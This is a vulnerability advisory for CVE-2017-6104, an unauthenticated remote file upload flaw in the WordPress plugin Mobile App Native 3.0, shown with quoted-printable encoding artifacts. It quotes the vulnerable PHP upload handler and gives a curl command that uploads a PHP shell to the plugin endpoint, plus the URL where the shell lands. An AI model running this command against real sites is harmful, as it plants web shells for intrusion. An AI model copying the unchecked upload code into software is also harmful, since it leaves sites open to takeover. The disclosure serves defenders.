Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0

Title: Remote file upload vulnerability in Wordpress Plugin Mobile App =
Native 3.0
Vulnerability Date: 2017-02-27
Download: https://wordpress.org/plugins/zen-mobile-app-native/
Vendor: https://profiles.wordpress.org/zendkmobileapp/
Notified: 2017-02-27
Vendor Contact:=20
Description: Mobile App WordPress plugin lets you turn your website into =
a full-featured mobile application in minutes using Mobile App Builder.
Vulnerability: The code in file =
./zen-mobile-app-native/server/images.php doesnt require authentication =
or check that the user is allowed to upload content.
It also doesnt sanitize the file upload against executable code.

<?php
//header(content-type: text/html; charset=3Diso-8859-2);
header(Content-Type: text/html; charset=3Dutf-8);
header(Access-Control-Allow-Origin: *);
require_once(function.php);

	if ($_FILES[file][name]) {
            if (!$_FILES[file][error]) {
                $name =3D md5(rand(100, 200));
                $ext =3D explode(., $_FILES[file][name]);
                $filename =3D $name . . . $ext[1];
                $destination =3D images/ . $filename;
                $location =3D $_FILES["file"]["tmp_name"];
                move_uploaded_file($location, $destination);
                echo $plugin_url./server/images/ . $filename;
            }
            else {
              echo  $message =3D Ooops!  Your upload triggered the =
following error:  .$_FILES[file][error];
            }
    }
CVEIDs: CVE-2017-6104
Exploit: $=20
curl   -F "file=3D@/var/www/shell.php" =
"http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/ser=
ver/images.php"
=
http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//ser=
ver/images/8d5e957f297893487bd98fa830fa6413.php

=
https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh

URL: http://www.vapidlabs.com/advisory.php?v=3D178
Credit: Larry W. Cashdollar, @_larry0



=
https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh=